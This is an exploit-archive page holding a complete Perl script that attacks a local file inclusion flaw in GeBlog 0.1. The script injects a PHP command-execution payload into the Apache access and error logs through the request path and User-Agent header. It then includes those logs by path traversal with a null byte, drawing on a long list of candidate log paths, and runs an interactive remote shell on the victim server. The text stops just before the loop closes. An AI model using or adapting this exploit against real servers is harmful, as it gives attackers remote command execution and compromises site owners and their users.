Home / exploitsPDF  

geblog01-lfi.txt

Posted on 21 March 2007

#!/usr/bin/perl # GeBlog 0.1(GLOBALS[tplname])Local File Inclusion Exploit # D.Script: http://sourceforge.net/projects/geblog/ # V.Code: include "tpl/".$GLOBALS['tplname']."/html.func.inc.php"; # Discovered & Coded by : GolD_M = [Mahmood_ali] # Contact:HackEr_@w.Cn # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group # Thanx : Alk()mand()z & Q8Trojan use IO::Socket; use LWP::Simple; #ripped @apache=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. /../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); if (@ARGV < 3) { print " =============================================================== | GeBlog 0.1(GLOBALS[tplname])Local File Inclusion Exploit | | Gold.pl [Victim] /tpl/Default/ (apachepath) | | Ex: Gold.pl [Victim] /tpl/Default/ ../logs/error.log | --------------------------------------------------------------- | Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group | | Thanx : Alk()mand()z & Q8Trojan | =============================================================== "; exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print "Code is injecting in logfiles... "; $CODE="<?php ob_clean();system($HTTP_COOKIE_VARS[cmd]);die;?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed. "; print $socket "GET ".$path.$CODE." HTTP/1.1 "; print $socket "user-Agent: ".$CODE." "; print $socket "Host: ".$host." "; print $socket "Connection: close "; close($socket); print "Write END to exit! "; print "If not working try another apache path "; print "[shell] ";$cmd = <STDIN>; while($cmd !~ "END") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed. "; #now include parameter print $socket "GET ".$path."index.php?GLOBALS[tplname]=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1 "; print $socket "Host: ".$host." "; print $socket "Accept: */* "; print $socket "Connection: close "; while ($raspuns = <$socket>) { print $raspuns; } print "[shell] "; $cmd = <STDIN>;

 

TOP